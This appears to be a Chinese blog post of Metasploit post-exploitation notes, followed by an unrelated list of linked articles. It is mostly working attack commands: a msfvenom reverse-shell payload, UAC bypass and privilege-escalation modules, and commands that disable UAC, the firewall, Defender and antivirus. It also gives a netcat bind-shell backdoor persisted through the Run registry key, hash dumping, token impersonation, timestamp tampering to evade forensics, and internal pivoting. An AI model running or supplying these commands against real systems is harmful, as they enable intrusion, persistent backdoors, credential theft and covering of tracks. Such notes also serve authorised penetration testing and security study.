Msf后渗透测试阶段

news2024/11/15 22:26:58

● 已经获得目标系统控制权后扩大战果
○ 提权
○ 信息收集
○ 渗透内网
○ 永久后门
● 基于已有session扩大战果

`msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00"-e x86/shikata_ga_nai -f exe -o` 1.exe

获取system账号权限

load priv
getsystem
  #一般情况下就权限拒绝,下面就要用UAC绕过了

绕过UAC限制

use exploit/windows/local/ask
    set session
  	set filename

use exploit/windows/local/bypassuac
use explot/windows/local/bypassuac_injuection
  set session
  set payload

利用漏洞直接提权为system

use exploit/windows/local/ms13_053_schlamperei
use exploit/windows/local/ms13_081_track_popup_menu
use exploit/windows/local/ms13_097_ie_registry_symlink
use exploit/windows/local/ppr_flatten_rec

图形化payload

set payload windows/vncinject/reverse_tcp
set viewonly no  #可操作

Psexec模块之Pass

use exploit/windows/smb/psexec
set smbpass hash

需要提前关闭UAC

cmd.exe /k %windir%\Sysem32\reg.exe ADD
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v 
EnableLUA /t REG_DWORD /d 0 /f

cmd.exe /k %windir%\System32\reg.exe ADD
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v
LocalAccountTokenFilterPolicy /t REG_DWOED /d 1 /f

● 关闭windows防火墙

#需要管理员或system权限
netsh advfirewall set allprofiles state off

● 关闭Windefend

net stop windefend

● Bitlocker磁盘加密

manage-bde -off C:  #关闭磁盘加密
manage-bde -states C:

● 关闭DEP

bcdedit.exe /set{current} nx AlwaysOff

● 杀死防病毒软件

run killav
run post/windows/manage/killav

● 开启远程桌面服务

run post/windows/manage/enable_rdp
run getgui -e
    run getgui -u yuanfh -p pass
    run multi_console_command -rc clean_up_20160824.1855.rc

● 查看远程桌面

screenshot  #截图
use espia
    screengrab

● Tokens
○ 用户每次登录,账号绑定临时的Token
○ 访问资源时提交Token进行身份验证,类似于WEB Cookie
○ Delegate Token:交互登陆会话
○ Impersonate Token:非交互登录会话
○ Delegate Token账号注销后变为Impersonate Token,权限依然有效
● Incognito
○ 独立功能的软件,被MSF集成在meterpreter中
○ 无需密码破解或获取密码HASH,窃取Token将自己伪装成其他用户
○ 尤其适用于域环境下提权、渗透多操作系统

list_tokens -u
  impersonate_token lab\\administrator

● 运行以上命令需要getsystem
○ 本地普通权限用户需先本地提权

use exploit/windows/local/ms10_015_kitrap0d
execute -f cmd.exe -i -t  # -t:使用当前假冒的token执行程序
shell

● 注册表保存着windows几乎全部配置参数
○ 如果修改不当,可直接造成系统崩溃
○ 修改前完整备份注册表
○ 某些注册表的修改是不可逆的
● 常见用法
○ 修改、增加启动项
○ 窃取存储于注册表中的机密信息
○ 绕过文件型的病毒查杀

用注册表添加NC后门服务(meterpreter)

upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32  #上传NC

在这里插入图片描述

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run  #新建主键

    #建立子键,给予赋值
  reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'

 #查询是否成功
    reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

在这里插入图片描述

● 打开防火墙端口(meterpreter)

execute -f cmd -i -H
netsh firewall show opmode
netsh firewall add portopening TCP 444 "test" ENABLE ALL

**加粗样式**
在这里插入图片描述

● 然后重启目标客户端

shutdown -r -t 0

● 重启之后会自动运行nc
在这里插入图片描述

● 然后直接连接即可
在这里插入图片描述

抓包

load sniffer  #导入抓包模块
sniffer_interfaces
sniffer_start 2
sniffe_dump 2 1.cap     /   sniffer_dump 2 1.cap

● 在内存中缓存区块循环存储抓包(50000包),不写硬盘
● 智能过滤meterpreter流量,传输全程使用SSL/TLS加密

解码

use auxiliary/sniffer/psnuffle 
  set PCAPFILE 1.cap

搜索文件

search -f *.ini
search -d c:\\document\ and\ settings\\administrator\\desktop\\ -f *.docx

在这里插入图片描述

John the Ripper破解弱口令

use post/windows/gather/hashdump  #system权限的meterpreter
run  #结果保存在/tmp目录下

在这里插入图片描述

● 文件系统访问会留下痕迹,电子取证重点关注
● 渗透测试和攻击者往往希望销毁文件系统访问痕迹
● 最好的避免被电子取证发现的方法:不要碰文件系统
○ Meterpreter的先天优势所在(完全基于内存)
● MAC时间(Modified / Accessed / Changed)

ls -l --time=atime/ctime 1.txt
stat 1.txt
touch -d "2 days ago" 1.txt  #修改时间
touch -t 1501010101 1.txt  #年月日时分

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

MACE:MFT entry

● MFT:NTFS文件系统的主文件分配表 Master File Table
● 通常1024字节或2个硬盘扇区,其中存放多项entry信息
● 包含文件大量信息(大小 名称 目录位置 磁盘位置 创建日期)
● 更多信息可研究,文件系统取证分析技术

Timestomp

timestomp -v 1.txt
timestomp -f c:\\autoexec.bat 1.txt
-b -r  #擦除MACE时间信息,目前此参数功能失效
-m / -a / -c / -e / -z
timestomp -z "MM/DD/YYYY HH24:MI:SS" 2.txt

Pivoting跳板 / 枢纽 /支点

● 利用已经控制的一台计算机作为入侵内网的跳板
● 在其他内网计算机看来访问全部来自于跳板机

run autoroute -s 1.1.1.0/24  #不能访问外网的被攻击目标内网网段

自动路由 现实场景

● 利用win攻击内网机器(对比XP有无外网访问权限的情况)
● 扫描内网

use auxiliary/scanner/postscan/tcp

Pivoting端口转发Portfwd

● 利用已经被控计算机,在kali与攻击目标之间实现端口转发

portfwd add -L LIP -l LPORT -r RIP -p RPORT
portfwd add -L 1.1.1.10 -l 445 -r 2.1.1.11 -p 3389
portfwd list / delete / flush


use exploit/windows/smb/ms08_067_netapi
  set RHOST 127.0.0.1
  set LHOST 2.1.1.10

use exploit/multi/handler
  set exitonsession false

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/150989.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

重发布-路由策略实验2(1.8)

目标: 1、首先对每个路由器进行接口ip的配置 r1: [r1]interface GigabitEthernet 0/0/0 [r1-GigabitEthernet0/0/0]ip add 12.1.1.1 24 [r1-GigabitEthernet0/0/0]int gi 0/0/1 [r1-GigabitEthernet0/0/1]ip add 13.1.1.1 24 [r1-GigabitEthernet0/0/1…

LinkedList与单向链表(二)(双向链表)

1.ListedList的模拟实现package Demo1;/*** Describe:双向链表的简单模拟实现* User:lenovo* Date:2023-01-08* Time:11:20*/ class Node {int val;Node prev;Node next;public Node(int val) {this.val val;}public Node() {} } public class MyLinkedList {Node first;Node …

Linux--权限

一、目录权限 文件的权限描述符,由10个字母组成 如下图所示,可以按照1-3-3-3的结构划分,用rwx表示拥有权限,r代表read(可读),w代表write(可写),x代表execut…

Python高阶技巧(十二)

python学习之旅(十二) 👍查看更多可以关注查看首页或点击下方专栏目录 一.闭包 可以保存函数内变量,不会随着函数调用完而销毁 (1) 基本定义 在函数嵌套的前提下,内部函数使用了外部函数的变量,并且外部函数返回了内部函数&#x…

万字长文,带你从0到1的了解商业智能BI

借助互联网技术的发展,每天我们都会接触到大量的信息,信息的增长速度可以说是海啸级的。在这样一个信息爆炸的时代,掌握怎样利用数据就相当于掌握了一项生存技能,很多可以发掘并充分利用数据的企业会发现自己远远领先于竞争对手。…

Android 反编译初探-基础篇

前言 本文目标: 工具:介绍反编译需要用到的工具原理:反编译基本原理实践:替换一个未混淆&未加固apk的启动页面 工具 1.Android Studio 版本:Android Studio Dolphin | 2021.3.1 Patch 1 2.Jadx Class Decomp…

go 数组(array)和切片(slice)

文章目录数组ArraySlice 切片appendcopy(切片复制)goto数组Array 和以往的数组有很大的不同 数组时值类型,复制和传参会复制整个数组,而不是指针数组长度必须是常量,且是类型的组成部分。[2]int和[3]int是不同的数据…

Vue中Vue.use()的原理及基本使用

目录 🔥 前言 1. 举例理解 2. 源码分析 🔥 小结 相信很多人在用Vue使用别人的组件时,会用到 Vue.use() ,例如:Vue.use(VueRouter)、Vue.use(MintUI),这篇文章主要给大家介绍了关于Vue中Vue.use()的原理及基本使用的相关资料&a…

Mysql索据-Mysql的innodb引擎为什么要使用b+tree作为索引数据结构?

目录 索引? 什么是索引?索引有什么优点?索引有什么缺点? 索引的分类 按照功能分类: 按照数据结构分类 相关数据结构(b-tree、btree) b-tree btree b-tree和btree的区别 为什么Innodb要…

65. 锚框的代码实现

目标检测算法通常会在输入图像中采样大量的区域,然后判断这些区域中是否包含我们感兴趣的目标,并调整区域边界从而更准确地预测目标的真实边界框(ground-truth bounding box)。 不同的模型使用的区域采样方法可能不同。 这里我们…

TiDB学习笔记(八)-数据库故障处理

一、数据丢失快速恢复 数据恢复前置条件-GC,tidb_gc_life_time 查询GC已经清理的时间点tikv_gc_safe_point 数据快速恢复操作方式 DML->tidb_snapshot参数 (在tikv_gc_safe_point范围内) DDL->flashback table/recover table (flas…

AIGC与搜索深度融合,百度定义“生成式搜索”

设想一下,当你搜索“公司活动通知怎么写”时,搜索引擎直接“写”了一篇送到眼前是什么体验?百度的“生成式搜索”正在让这样的场景成为现实。日前,百度宣布,百度搜索将升级“生成式搜索”能力,基于百度自研…

项目管理工具dhtmlxGantt甘特图入门教程(七):在服务器上使用甘特图

dhtmlxGantt是用于跨浏览器和跨平台应用程序的功能齐全的Gantt图表,可满足项目管理控件应用程序的所有需求,是最完善的甘特图图表库。 这篇文章给大家讲解如何在服务器上使用DHTMLX Gantt 。 DhtmlxGantt正版试用下载(qun:764…

Cadence PCB仿真使用Allegro PCB SI元器件类别设置为IO,IC和Discrete的方法图文教程

⏪《上一篇》   🏡《总目录》   ⏩《下一篇》 目录 1,概述2,配置方法3,总结1,概述 本文简单介绍使用Allegro PCB SI软件配置电压地网络电压的方法。 2,配置方法 第1步:打开待仿真的PCB文件,并确认软件为Allegro PCB SI 如果,打开软件不是Allegro PCB SI则可这样…

ElementUI源码系列一-完整引入和按需引入

前言 本篇将介绍,ElementUI 是如何实现完整引入和按需引入的。 完整引入 官网使用 源码步骤 src/index.js 通过对外暴露 install(),让主项目通过 Vue.use(ElementUI) 引入,还需单独引入样式 import element-ui/lib/theme-chalk/index.c…

Selenium用法详解【Options选项】【JAVA爬虫】

简介本文主要讲解如何使用java代码利用selenium控制浏览器的启动选项Options的代码操作教程。Options选项这是一个Chrome的参数对象,在此对象中使用addArgument()方法可以添加启动参数,添加完毕后可以在初始化Webdriver对象时将此Options对象传入&#x…

minio分布式存储的go语言开发衔接

minio是分布式存储,可集群部署,阵列磁盘,纠错码等大数据存储必备的技术。由于它是go语言开发的,我们用go来与它衔接:上传文件,比如图片,然后预览。这里涉及几个重要的知识点。一是minio永久路径…

Vue学习笔记(二)

Vue学习笔记二脚手架利用脚手架软件生成项目包脚手架 随着时代的发展, WEB开发逐渐出现了 工程化 特征: 流水线作业! 脚本方式: 到饭店 自选点餐… 脚手架方式: 点 套餐, 一套完善的配置,扩展, 各种易用功能… 脚手架: 就是一款软件, 可以按照用户需求自动生成 开发环境: 包含…

[博士论文]基于图数据的可信赖机器学习

密歇根大学Towards Trustworthy Machine Learning on Graph Datahttps://deepblue.lib.umich.edu/handle/2027.42/174201摘要机器学习已经被应用于越来越多影响我们日常生活的与社会相关的场景,从社交媒体和电子商务到自动驾驶汽车和刑事司法。因此,为了…

7-2 洛希极限

科幻电影《流浪地球》中一个重要的情节是地球距离木星太近时,大气开始被木星吸走,而随着不断接近地木“刚体洛希极限”,地球面临被彻底撕碎的危险。但实际上,这个计算是错误的。 洛希极限(Roche limit)是一…